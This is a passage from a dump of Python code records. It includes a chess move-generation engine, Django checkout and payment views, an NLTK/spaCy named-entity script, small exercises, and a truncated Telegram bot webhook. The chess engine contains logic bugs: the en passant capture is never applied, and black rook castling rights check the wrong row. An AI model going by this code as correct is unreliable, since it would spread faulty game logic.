End')\n\n\n","repo_name":"carlotacb/FiberZone","sub_path":"implementation/SellerExternalAgent.py","file_name":"SellerExternalAgent.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37842705082","text":"\"\"\"\nThis class is responsible for storing all information about the current state of a chess game. It will also\nbe responsible for determining the valid moves at the current state. It will also keep a move log.\n\"\"\"\n\nclass GameState():\n def __init__(self):\n # board is an 8x8 2D list, each element of the list has 2 characters\n # the first character represents the color of the piece, 'b' or 'w'\n # the second character represents the type of the piece, 'K', 'Q', 'R', 'B', 'N' or 'P'\n # \"--\" represents an empty space with no piece\n self.board = [\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\n [\"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\"],\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"]\n ]\n self.moveFunctions = {'p': self.getPawnMoves, 'R': self.getRookMoves, 'N': self.getKnightMoves,\n 'B': self.getBishopMoves, 'Q': self.getQueenMoves, 'K': self.getKingMoves}\n self.whiteToMove = True\n self.moveLog = []\n self.whiteKingLocation = (7, 4)\n self.blackKingLocation = (0, 4)\n self.inCheck = False\n self.pins = []\n self.checks = []\n self.enpassantPossible = () # coordinates for the square where en passant capture is possible\n self.currentCastlingRight = CastleRights(True, True, True, True)\n self.castleRightsLog = [CastleRights(self.currentCastlingRight.wks, self.currentCastlingRight.bks, self.currentCastlingRight.wqs, self.currentCastlingRight.bqs)]\n\n\n def makeMove(self, move):\n self.board[move.startRow][move.startCol] = \"--\"\n self.board[move.endRow][move.endCol] = move.pieceMoved\n self.moveLog.append(move) # log the move so we can undo later\n self.whiteToMove = not self.whiteToMove # switch turns\n # update the king's location if moved\n if move.pieceMoved == 'wK':\n self.whiteKingLocation = (move.endRow, move.endCol)\n if move.pieceMoved == 'bK':\n self.blackKingLocation = (move.endRow, move.endCol)\n\n # pawn promotion\n if move.isPawnPromotion:\n self.board[move.endRow][move.endCol] = move.pieceMoved[0] + 'Q'\n # en passant\n if move.isEnpassantMove:\n self.board[move.startRow][move.endCol] == \"--\" # capture the pawn\n # update enpassantPossible variable\n if move.pieceMoved[1] == 'p' and abs(move.startRow - move.endRow) == 2: # only on 2 square pawn advances\n self.enpassantPossible = ((move.startRow + move.endRow) // 2, move.startCol)\n else:\n self.enpassantPossible = ()\n\n # castle move\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # kingside castle move\n self.board[move.endRow][move.endCol - 1] = self.board[move.endRow][move.endCol + 1] # move the rook\n self.board[move.endRow][move.endCol + 1] = \"--\" # erase old rook\n else: # queenside castle move .\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][move.endCol - 2] # move the rook\n self.board[move.endRow][move.endCol - 2] = \"--\" # erase old rook\n # update castling rights - whenever it is a rook or king move\n self.updateCastleRights(move)\n self.castleRightsLog.append(CastleRights(self.currentCastlingRight.wks, self.currentCastlingRight.bks, self.currentCastlingRight.wqs, self.currentCastlingRight.bqs))\n\n\n '''\n Undo the last move\n '''\n\n def undoMove(self):\n if len(self.moveLog) != 0: # make sure that there is a move to undo\n move = self.moveLog.pop()\n self.board[move.startRow][move.startCol] = move.pieceMoved\n self.board[move.endRow][move.endCol] = move.pieceCaptured\n self.whiteToMove = not self.whiteToMove # switch turns\n # update the king's position if needed\n if move.pieceMoved == 'wK':\n self.whiteKingLocation = (move.startRow, move.startCol)\n elif move.pieceMoved == 'bK':\n self.blackKingLocation = (move.startRow, move.startCol)\n # undo en passant\n if move.isEnpassantMove:\n self.board[move.endRow][move.endCol] = \"--\" # leave landing square blank\n self.board[move.startRow][move.endCol] = move.pieceCaptured\n self.enpassantPossible = (move.endRow, move.endCol)\n # undo a 2 square pawn advance\n if move.pieceMoved[1] == 'p' and abs(move.startRow - move.endRow) == 2:\n self.enpassantPossible = ()\n # undo castling rights\n self.castleRightsLog.pop() # get rid of new castle rights from the move we are undoing\n self.currentCastlingRight = self.castleRightsLog[-1] # set the current castle rights to the last one in the list\n # undo castle move\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # king side\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][move.endCol - 1]\n self.board[move.endRow][move.endCol - 1] = \"--\"\n else: # queen side\n self.board[move.endRow][move.endCol - 2] = self.board[move.endRow][move.endCol + 1]\n self.board[move.endRow][move.endCol + 1] = \"--\"\n\n self.inCheck = False\n # update the castle rights given the move\n def updateCastleRights(self, move):\n if move.pieceMoved == 'wK':\n self.currentCastlingRight.wks = False\n self.currentCastlingRight.wqs = False\n elif move.pieceMoved == 'bK':\n self.currentCastlingRight.bks = False\n self.currentCastlingRight.bqs = False\n elif move.pieceMoved == 'wR':\n if move.startRow == 7:\n if move.startCol == 0: # left rook\n self.currentCastlingRight.wqs = False\n elif move.startCol == 7: # right rook\n self.currentCastlingRight.wks = False\n elif move.pieceMoved == 'bR':\n if move.startRow == 7:\n if move.startCol == 0: # left rook\n self.currentCastlingRight.bqs = False\n elif move.startCol == 7: # right rook\n self.currentCastlingRight.bks = False\n '''\n All moves considering checks\n '''\n def getValidMoves(self):\n moves = []\n self.inCheck, self.pins, self.checks = self.checkForPinsAndChecks()\n if self.whiteToMove:\n kingRow = self.whiteKingLocation[0]\n kingCol = self.whiteKingLocation[1]\n else:\n kingRow = self.blackKingLocation[0]\n kingCol = self.blackKingLocation[1]\n\n if self.inCheck:\n if len(self.checks) == 1: # only 1 check, block check or move king\n moves = self.getAllPossibleMoves()\n # to block a check you must move a piece into one of the squares between the enemy piece and king\n check = self.checks[0] # check information\n checkRow = check[0]\n checkCol = check[1]\n pieceChecking = self.board[checkRow][checkCol] # enemy piece causing the check\n validSquares = [] # squares that pieces can move to\n # if knight, must capture knight or move king, other pieces can be blocked\n if pieceChecking[1] == 'N':\n validSquares = [(checkRow, checkCol)]\n else:\n for i in range(1, 8):\n validSquare = (kingRow + check[2] * i, kingCol + check[3] * i) # check[2] and check[3] are check directions\n validSquares.append(validSquare)\n if validSquare[0] == checkRow and validSquare[1] == checkCol: # once you get to piece and check\n break\n # get rid of any moves that don't block check or move king\n for i in range(len(moves) - 1, -1, -1): # go through backwards when you are removing from the list as iterating\n if moves[i].pieceMoved[1] != 'K': # move doesn't move king so it must block or capture\n if not (moves[i].endRow, moves[i].endCol) in validSquares: # move doesn't block check or capture piece\n moves.remove(moves[i])\n\n else:\n self.getKingMoves(kingRow, kingCol, moves)\n else: # not in check so all moves possible\n moves = self.getAllPossibleMoves()\n if self.whiteToMove:\n self.getCastleMove(self.whiteKingLocation[0], self.whiteKingLocation[1], moves)\n else:\n self.getCastleMove(self.blackKingLocation[0], self.blackKingLocation[1], moves)\n\n return moves\n '''\n All moves without considering checks\n '''\n def getAllPossibleMoves(self):\n moves = []\n for r in range(len(self.board)):\n for c in range(len(self.board[r])):\n turn = self.board[r][c][0]\n if (turn == 'w' and self.whiteToMove) or (turn == 'b' and not self.whiteToMove):\n piece = self.board[r][c][1]\n self.moveFunctions[piece](r, c, moves) # calls the appropriate move function based on piece type\n return moves\n\n\n\n\n '''\n Get all the pawn moves for the pawn located at row, col and add these moves to the list\n '''\n def getPawnMoves(self, r, c, moves):\n piecePinned = False\n pinDirection = ()\n for i in range(len(self.pins) - 1, -1, -1):\n if self.pins[i][0] == r and self.pins[i][1] == c:\n piecePinned = True\n pinDirection = (self.pins[i][2], self.pins[i][3])\n self.pins.remove(self.pins[i])\n break\n if self.whiteToMove:\n if self.board[r - 1][c] == \"--\": # 1 square move\n if not piecePinned or pinDirection == (-1, 0):\n moves.append(Move((r, c), (r - 1, c), self.board))\n if r == 6 and self.board[r - 2][c] == \"--\":\n moves.append(Move((r, c), (r - 2, c), self.board))\n # captures\n if c - 1 >= 0: # capture to left\n if self.board[r - 1][c - 1][0] == 'b':\n if not piecePinned or pinDirection == (-1, -1):\n moves.append(Move((r, c), (r - 1, c - 1), self.board))\n elif (r - 1, c - 1) == self.enpassantPossible:\n moves.append(Move((r, c), (r - 1, c - 1), self.board, isEnpassantMove=True))\n\n if c + 1 <= 7: # capture to right\n if self.board[r - 1][c + 1][0] == 'b':\n if not piecePinned or pinDirection == (-1, 1):\n moves.append(Move((r, c), (r - 1, c + 1), self.board))\n elif (r - 1, c + 1) == self.enpassantPossible:\n moves.append(Move((r, c), (r - 1, c + 1), self.board, isEnpassantMove=True))\n else:\n if self.board[r + 1][c] == \"--\":\n if not piecePinned or pinDirection == (1, 0):\n moves.append(Move((r, c), (r + 1, c), self.board))\n if r == 1 and self.board[r + 2][c] == \"--\":\n moves.append(Move((r, c), (r + 2, c), self.board))\n # captures\n if c - 1 >= 0: # capture to left\n if self.board[r + 1][c - 1][0] == 'w':\n if not piecePinned or pinDirection == (1, -1):\n moves.append(Move((r, c), (r + 1, c - 1), self.board))\n elif (r + 1, c - 1) == self.enpassantPossible:\n moves.append(Move((r, c), (r + 1, c - 1), self.board, isEnpassantMove=True))\n if c + 1 <= 7: # capture to right\n if self.board[r + 1][c + 1][0] == 'w':\n if not piecePinned or pinDirection == (1, 1):\n moves.append(Move((r, c), (r + 1, c + 1), self.board))\n elif (r + 1, c + 1) == self.enpassantPossible:\n moves.append(Move((r, c), (r + 1, c + 1), self.board, isEnpassantMove=True))\n # add pawn promotions later\n '''\n Get all the rook moves for the pawn located at row, col and add these moves to the list\n '''\n def getRookMoves(self, r, c, moves):\n piecePinned = False\n pinDirection = ()\n for i in range(len(self.pins) - 1, -1, -1):\n if self.pins[i][0] == r and self.pins[i][1] == c:\n piecePinned = True\n pinDirection = (self.pins[i][2], self.pins[i][3])\n if self.board[r][c][1] != 'Q': # can't remove queen from pin on rook moves, only remove it on bishop moves\n self.pins.remove(self.pins[i])\n break\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1))\n enemyColor = \"b\" if self.whiteToMove else \"w\"\n for d in directions:\n for i in range(1, 8):\n endRow = r + d[0] * i\n endCol = c + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n if not piecePinned or pinDirection == d or pinDirection == (-d[0], -d[1]):\n endPiece = self.board[endRow][endCol]\n if endPiece == \"--\": # empty space valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n elif endPiece[0] == enemyColor: # enemy piece valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n break\n else: # friendly piece invalid\n break\n else:\n break\n\n\n def getKnightMoves(self, r, c, moves):\n piecePinned = False\n pinDirection = ()\n for i in range(len(self.pins) - 1, -1, -1):\n if self.pins[i][0] == r and self.pins[i][1] == c:\n piecePinned = True\n self.pins.remove(self.pins[i])\n break\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\n allyColor = \"w\" if self.whiteToMove else \"b\"\n for m in knightMoves:\n endRow = r + m[0]\n endCol = c + m[1]\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n if not piecePinned:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] != allyColor: # not an ally piece (empty or enemy piece)\n moves.append(Move((r, c), (endRow, endCol), self.board))\n\n def getBishopMoves(self, r, c, moves):\n piecePinned = False\n pinDirection = ()\n for i in range(len(self.pins) - 1, -1, -1):\n if self.pins[i][0] == r and self.pins[i][1] == c:\n piecePinned = True\n pinDirection = (self.pins[i][2], self.pins[i][3])\n self.pins.remove(self.pins[i])\n break\n directions = ((-1, -1), (-1, 1), (1, -1), (1, 1)) # 4 diagonals\n enemyColor = \"b\" if self.whiteToMove else \"w\"\n for d in directions:\n for i in range(1, 8):\n endRow = r + d[0] * i\n endCol = c + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n if not piecePinned or pinDirection == d or pinDirection == (-d[0], -d[1]):\n endPiece = self.board[endRow][endCol]\n if endPiece == \"--\":\n moves.append(Move((r, c), (endRow, endCol), self.board))\n elif endPiece[0] == enemyColor:\n moves.append(Move((r, c), (endRow, endCol), self.board))\n break\n else:\n break\n else:\n break\n\n def getQueenMoves(self, r, c, moves):\n self.getRookMoves(r, c, moves)\n self.getBishopMoves(r, c, moves)\n\n def getKingMoves(self, r, c, moves):\n rowMoves = (-1, -1, -1, 0, 0, 1, 1, 1)\n colMoves = (-1, 0, 1, -1, 1, -1, 0, 1)\n allyColor = \"w\" if self.whiteToMove else \"b\"\n for i in range(8):\n endRow = r + rowMoves[i]\n endCol = c + colMoves[i]\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] != allyColor: # not an ally piece (empty or enemy piece)\n # place king on end square and check for checks\n if allyColor == 'w':\n self.whiteKingLocation = (endRow, endCol)\n else:\n self.blackKingLocation = (endRow, endCol)\n inCheck, pins, checks = self.checkForPinsAndChecks()\n if not inCheck:\n moves.append(Move((r, c), (endRow, endCol), self.board))\n # place king back on original location\n if allyColor == 'w':\n self.whiteKingLocation = (r, c)\n else:\n self.blackKingLocation = (r, c)\n\n '''\n Generate all valid castle moves for the king at (r, c) and add them to the list of moves\n '''\n def getCastleMove(self, r, c, moves):\n if self.inCheck:\n return # can't castle while we are in check\n if (self.whiteToMove and self.currentCastlingRight.wks) or (not self.whiteToMove and self.currentCastlingRight.bks):\n self.getKingsideCastleMoves(r, c, moves)\n if (self.whiteToMove and self.currentCastlingRight.wqs) or (not self.whiteToMove and self.currentCastlingRight.bqs):\n self.getQueensideCastleMoves(r, c, moves)\n def getKingsideCastleMoves(self, r, c, moves):\n if self.board[r][c + 1] == \"--\" and self.board[r][c + 2] == \"--\":\n if not self.squareUnderAttack(r, c + 1) and not self.squareUnderAttack(r, c + 2):\n moves.append(Move((r, c), (r, c + 2), self.board, isCastleMove=True))\n def getQueensideCastleMoves(self, r, c, moves):\n if self.board[r][c - 1] == \"--\" and self.board[r][c - 2] == \"--\" and self.board[r][c - 3] == \"--\":\n if not self.squareUnderAttack(r, c - 1) and not self.squareUnderAttack(r, c - 2):\n moves.append(Move((r, c), (r, c - 2), self.board, isCastleMove=True))\n\n def squareUnderAttack(self, r, c):\n self.whiteToMove = not self.whiteToMove # switch to opponent's turn\n oppMoves = self.getAllPossibleMoves()\n self.whiteToMove = not self.whiteToMove # switch turns back\n for move in oppMoves:\n if move.endRow == r and move.endCol == c: # square is under attack\n return True\n return False\n def checkForPinsAndChecks(self):\n pins = [] # squares where the allied pinned piece is and direction pinned from\n checks = [] # squares where enemy is applying a check\n inCheck = False\n if self.whiteToMove:\n enemyColor = \"b\"\n allyColor = \"w\"\n startRow = self.whiteKingLocation[0]\n startCol = self.whiteKingLocation[1]\n\n else:\n enemyColor = \"w\"\n allyColor = \"b\"\n startRow = self.blackKingLocation[0]\n startCol = self.blackKingLocation[1]\n # check outward from king for pins and checks, keep track of pins\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1))\n for j in range(len(directions)):\n d = directions[j]\n possiblePin = ()\n for i in range(1, 8):\n endRow = startRow + d[0] * i\n endCol = startCol + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] == allyColor and endPiece[1] != 'K':\n if possiblePin == (): # first allied piece could be pinned\n possiblePin = (endRow, endCol, d[0], d[1])\n else: # second allied piece, so no pin or check possible in this direction\n break\n elif endPiece[0] == enemyColor:\n type = endPiece[1]\n #5 possibilities here in this complex conditional\n #1.) orthogonally away from king and piece is a rook\n #2.) diagonally away from king and piece is a bishop\n #3.) 1 square away diagonally from king and piece is a pawn\n #4.) any direction and piece is a queen\n #5.) any direction 1 square away and piece is a king\n # (this is necessary to prevent a king move to a square controlled by another king)\n if (0 <= j <= 3 and type == 'R') or \\\n (4 <= j <= 7 and type == 'B') or \\\n (i == 1 and type == 'p' and ((enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))) or \\\n (type == 'Q') or (i == 1 and type == 'K'):\n if possiblePin == (): # no piece blocking, so check\n inCheck = True\n checks.append((endRow, endCol, d[0], d[1]))\n break\n else: # piece blocking so pin\n pins.append(possiblePin)\n break\n else: # enemy piece not applying check\n break\n else: # off board\n break\n # check for knight checks\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\n for m in knightMoves:\n endRow = startRow + m[0]\n endCol = startCol + m[1]\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] == enemyColor and endPiece[1] == \"N\": # enemy knight attacking king\n inCheck = True\n checks.append((endRow, endCol, m[0], m[1]))\n return inCheck, pins, checks\n\n\nclass CastleRights():\n def __init__(self, wks, bks, wqs, bqs):\n self.wks = wks\n self.bks = bks\n self.wqs = wqs\n self.bqs = bqs\n\nclass Move():\n\n ranksToRows = {\"1\": 7, \"2\": 6, \"3\": 5, \"4\": 4, \"5\": 3, \"6\": 2, \"7\": 1, \"8\": 0}\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\n filesToCols = {\"a\": 0, \"b\": 1, \"c\": 2, \"d\": 3, \"e\": 4, \"f\": 5, \"g\": 6, \"h\": 7}\n colsToFiles = {v: k for k, v in filesToCols.items()}\n\n '''\n Overriding the equals method\n '''\n def __eq__(self, other):\n if isinstance(other, Move):\n return self.moveID == other.moveID\n return False\n\n def __init__(self, startSq, endSq, board, isEnpassantMove=False, isCastleMove=False):\n self.startRow = startSq[0]\n self.startCol = startSq[1]\n self.endRow = endSq[0]\n self.endCol = endSq[1]\n self.pieceMoved = board[self.startRow][self.startCol]\n self.pieceCaptured = board[self.endRow][self.endCol]\n self.isPawnPromotion = (self.pieceMoved == 'wp' and self.endRow == 0) or (self.pieceMoved == 'bp' and self.endRow == 7)\n self.isEnpassantMove = isEnpassantMove\n if self.isEnpassantMove:\n self.pieceCaptured = 'wp' if self.pieceMoved == 'bp' else 'bp'\n self.isCastleMove = isCastleMove\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.endRow * 10 + self.endCol\n\n def getChessNotation(self):\n return self.getRankFile(self.startRow, self.startCol) + self.getRankFile(self.endRow, self.endCol)\n\n def getRankFile(self, r, c):\n return self.colsToFiles[c] + self.rowsToRanks[r]","repo_name":"maitnngo2002/AI-Chess-Engine","sub_path":"Chess/ChessEngine.py","file_name":"ChessEngine.py","file_ext":"py","file_size_in_byte":24433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32543991572","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.template.backends import django\nimport django.core.mail\n\nfrom .form import OrderForm\nfrom busket.models import busketItems\nfrom .models import Order, Payment, orderPoduct\nfrom store.models import product\nimport datetime\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\n\n\n\n\ndef place_order(request,total=0,quantity=0):\n # Gtotal = 0\n # tax = 0\n current_user = request.user\n cart_items = busketItems.objects.filter(user=current_user)\n cart_count =cart_items.count()\n if cart_count <= 0:\n return redirect('store')\n if request.method == 'POST':\n form = OrderForm(request.POST)\n\n for cart_item in cart_items:\n quantity += cart_item.quantity\n total += cart_item.product_busket_item.product_price * cart_item.quantity\n tax = (0.02 * total)\n Gtotal = total + tax\n print(form.errors)\n if form.is_valid():\n print(form.errors)\n data = Order()\n data.first_name = form.cleaned_data['first_name']\n data.last_name = form.cleaned_data['last_name']\n data.phone = form.cleaned_data['phone']\n data.email = form.cleaned_data['email']\n data.address_line_1 = form.cleaned_data['address_line_1']\n data.address_line_2 = form.cleaned_data['address_line_2']\n data.country = form.cleaned_data['country']\n data.state = form.cleaned_data['state']\n data.city = form.cleaned_data['city']\n data.order_note = form.cleaned_data['order_note']\n data.user = current_user\n data.total = Gtotal\n data.tax = tax\n data.ip = request.META.get('REMOTE_ADDR')\n data.save()\n yr = int(datetime.date.today().strftime('%Y'))\n dt = int(datetime.date.today().strftime('%d'))\n mt = int(datetime.date.today().strftime('%m'))\n d = datetime.date(yr,mt,dt)\n current_date = d.strftime('%Y%d%m')\n order_number = current_date+str(data.id)\n data.order_number = order_number\n data.save()\n order = Order.objects.get(user=current_user,is_ordered=False,order_number=order_number)\n context ={\n 'order':order,\n 'cart_items':cart_items,\n 'total':total,\n 'tax':tax,\n 'Gtotal':Gtotal\n\n }\n return render(request,'orders/payments.html',context)\n else:\n print('not vaild')\n print(form.errors)\n return redirect('checkout')\ndef payments(request):\n current_user = request.user\n body = json.loads(request.body)\n print(body)\n order = Order.objects.get(user= current_user,is_ordered=False, order_number=body['orderID'])\n payment = Payment(\n user = current_user,\n payment_id = body['transID'],\n payment_method = body['payment_method'],\n status = body['status'],\n amount_paid= order.total,\n\n )\n payment.save()\n order.payment = payment\n order.is_ordered = True\n order.save()\n cart_items = busketItems.objects.filter(user=current_user)\n for item in cart_items:\n #fill order product model\n orderPoductt = orderPoduct()\n orderPoductt.order_id = order.id\n orderPoductt.payment = payment\n orderPoductt.user_id = current_user.id\n orderPoductt.product_id = item.product_busket_item_id\n orderPoductt.quantity = item.quantity\n orderPoductt.product_price = item.product_busket_item.product_price\n orderPoductt.ordered = True\n orderPoductt.save()\n # bring variations because it is many to many\n cart_item = busketItems.objects.get(id=item.id)\n product_variation= cart_item.variations.all()\n orderPoducttt = orderPoduct.objects.get(id=orderPoductt.id)\n orderPoducttt.variations.set(product_variation)\n orderPoducttt.save()\n # Reduce the quantity\n productt = product.objects.get(id=item.product_busket_item_id)\n productt.product_stock -= item.quantity\n productt.save()\n #clear cart\n busketItems.objects.filter(user=current_user).delete()\n #send mail to customer\n mail_subject = 'Congratulation your order has set successfully'\n mail_body = render_to_string('orders/orderset.html', {\n 'user': current_user,\n 'order_number': order ,\n\n })\n to_email = current_user.email\n send_mail = django.core.mail.EmailMessage(mail_subject, mail_body, to=[to_email])\n send_mail.send()\n # send data to invoice\n data ={\n 'order_number':order.order_number,\n 'transID': payment.payment_id,\n }\n return JsonResponse(data)\ndef order_complete(request):\n order_number = request.GET.get('order_number')\n payment_id = request.GET.get('payment_id')\n try:\n order = Order.objects.get(order_number=order_number, is_ordered=True)\n order_Poduct = orderPoduct.objects.filter(order_id=order.id)\n payment = Payment.objects.get(payment_id=payment_id)\n Sub_Total = 0\n for i in order_Poduct:\n Sub_Total += i.product_price * i.quantity\n\n context={\n 'order':order,\n 'order_Poduct':order_Poduct,\n 'order_number':order_number,\n 'payment_id':payment,\n 'Sub_Total':Sub_Total\n }\n return render(request, 'orders/order_complete.html', context)\n except(Order.DoesNotExist,Payment.DoesNotExist):\n return redirect('home')\n\n\n\n\n\n\n\n\n","repo_name":"mohamed-mashaly1403/greatCart-django-python","sub_path":"Cart/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23084832631","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\n\n\nif __name__ == \"__main__\":\n word = input(\"Введите слово: \")\n s = int(input(\"Введите № буквы, которую желаете переставить: \"))\n k = int(input(\"Введите № буквы, на место которой нужно поставить букву: \"))\n\n if s >= k:\n print(\"Недопустимое значение\", file=sys.stderr)\n exit(1)\n\n s -= 1\n k -= 1\n\n print(word[:s] + word[s + 1:k + 1] + word[s] + word[k + 1:])","repo_name":"DFooRS/6laba","sub_path":"individual3.py","file_name":"individual3.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73612320362","text":"n, m = map(int, input().split())\n\n\ndef next_position():\n while True:\n middle = m // 2 + (m % 2)\n count = m\n left, right = middle, middle\n if m % 2 == 1:\n left_diff, right_diff = -1, 1\n else:\n left_diff, right_diff = 1, -1\n yield middle\n while count > 1:\n left += left_diff\n yield left\n count -= 1\n if count == 1:\n break\n right += right_diff\n yield right\n count -= 1\n\n\npos = next_position()\n\nfor _ in range(n):\n print(next(pos))\n","repo_name":"kirilllapushinskiy/code","sub_path":"tinkoff-golang-for-all/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24536057947","text":"###### Named Entity Recognition with nltk ##############################\r\nimport nltk\r\nfrom nltk.tokenize import word_tokenize, sent_tokenize\r\n\r\n\r\nnltk.download('averaged_perceptron_tagger')\r\nnltk.download('maxent_ne_chunker')\r\nnltk.download('words')\r\n\r\n\r\narticle = open(r'C:\\Users\\sg_cl\\Desktop\\Pythonproject\\Final exam\\ML\\scene_one.txt')\r\n#open(r'C:\\Users\\sg_cl\\Desktop\\Pythonproject\\Final exam\\ML\\article.txt', encoding=\"utf8\")\r\narticle = article.read().replace(\"\\n\",\" \")\r\n#print(article)\r\n\r\nsentence = nltk.sent_tokenize(article)\r\n# Tokenize each sentence into words: token_sentences\r\ntoken = [nltk.word_tokenize(f) for f in sentence]\r\n#print(token)\r\n\r\n# Tag each tokenized sentence into parts of speech: pos_sentences\r\npos_tag = [nltk.pos_tag(t) for t in token]\r\n\r\n# Create the named entity chunks: chunked_sentences\r\nchunked_sentences = nltk.ne_chunk_sents(pos_tag, binary = True)\r\n#print(list(chunked_sentences))\r\n\r\n# Test for stems of the tree with 'NE' tags\r\nfor sent in chunked_sentences:\r\n for chunk in sent:\r\n if hasattr(chunk, \"label\") and chunk.label() == \"NE\":\r\n print(chunk)\r\n \r\n\r\n############# Charting practice #################################################\r\n\r\nimport collections\r\n\r\n# Create the defaultdict: ner_categories\r\nner_categories = collections.defaultdict(int)\r\n\r\n#fill up the dictionary with values\r\nfor sent in chunked_sentences:\r\n for chunk in sent:\r\n if hasattr(chunk, 'label'):\r\n print(ner_categories) \r\n ner_categories[chunk.label()] += 1\r\n#print(ner_categories)\r\n\r\n#Create a list called labels from the keys of dictionary(ner_categories)\r\nlabels = list(ner_categories.keys())\r\n#print(labels)\r\n\r\n#Create list of values\r\nvalues = [ner_categories.get(v) for v in labels]\r\n\r\n########## spacy ##################################################################\r\n\r\nimport spacy\r\n\r\n#instantiate english model\r\nnlp = spacy.load(\"en_core_web_sm\")\r\n\r\n#create the doc\r\ndoc = nlp(article)\r\n\r\n#print all of the found entities and their labels\r\nfor x in doc.ents:\r\n print(x.label_,x.text)\r\n \r\n############ Polyglot ##############################################################\r\nfrom polyglot.text import Text\r\n\r\ntest = 'telediario dijeron que tendríamos un nuevo día feriado nacional.'\r\n\r\nptext = Text(test)\r\n\r\n# Print each of the entities found\r\nfor ent in ptext.entities:\r\n print(ent)\r\n \r\n# Print the type of ent\r\nprint(type(ent))\r\n\r\n\r\n\r\n","repo_name":"srig619iitS/NLP","sub_path":"NLP_NER.py","file_name":"NLP_NER.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29585500076","text":"import json\nimport logging\nfrom typing import Optional\n\nfrom telebot import TeleBot\nfrom telebot.types import Update\n\nfrom django.http import HttpResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\n\n__all__ = [\"WebHookView\"]\n\nfrom apps.common.utils import get_object_or_none\nfrom apps.users.models import Event, User\n\nlogger = logging.getLogger(\"telegram.bot\")\n\n\nclass WebHookView(View):\n BOT: TeleBot = None\n\n @method_decorator(csrf_exempt)\n def dispatch(self, *args, **kwargs):\n return super(WebHookView, self).dispatch(*args, **kwargs)\n\n @property\n def bot(self) -> TeleBot:\n if not WebHookView.BOT:\n from apps.bot.bot import bot\n from apps.bot.handlers import common # noqa\n from apps.bot.handlers import find_trip # noqa\n from apps.bot.handlers import new_trip # noqa\n from apps.bot.handlers import trips_list # noqa\n\n WebHookView.BOT = bot\n\n return WebHookView.BOT\n\n def post(self, request) -> HttpResponse:\n body = request.body.decode(\"utf-8\")\n\n try:\n data = json.loads(body)\n\n if \"callback_query\" in data:\n text = data[\"callback_query\"][\"data\"]\n\n button_text = None\n for buttons in data[\"callback_query\"][\"message\"][\"reply_markup\"][\"inline_keyboard\"]:\n for button in buttons:\n if text == button[\"callback_data\"]:\n button_text = f\"Кнопка '{button['text']}'\"\n break\n if button_text:\n break\n if button_text:\n text = button_text\n\n else:\n try:\n if \"photo\" in data[\"message\"]:\n text = data[\"message\"].get(\"text\", \"<ФОТО>\")\n elif \"document\" in data[\"message\"]:\n text = data[\"message\"].get(\"text\", \"<ДОКУМЕНТ>\")\n else:\n text = data[\"message\"].get(\"text\", \"<НЕТ ТЕКСТА>\")\n except Exception as e:\n logger.exception(\"Error occurred\")\n text = \"\"\n\n if \"callback_query\" in data:\n data = data[\"callback_query\"]\n\n telegram_user_id = data[\"message\"][\"chat\"][\"id\"]\n user: Optional[User] = get_object_or_none(User, telegram_user_id=telegram_user_id)\n if user:\n Event.objects.create(user=user, text=text, message_id=data[\"message\"][\"message_id\"])\n else:\n logger.warning(f\"telegram_user_id={telegram_user_id} was not found\")\n except Exception as e:\n logger.exception(f\"Error occurred: >>>{body}<<<\")\n\n try:\n update = 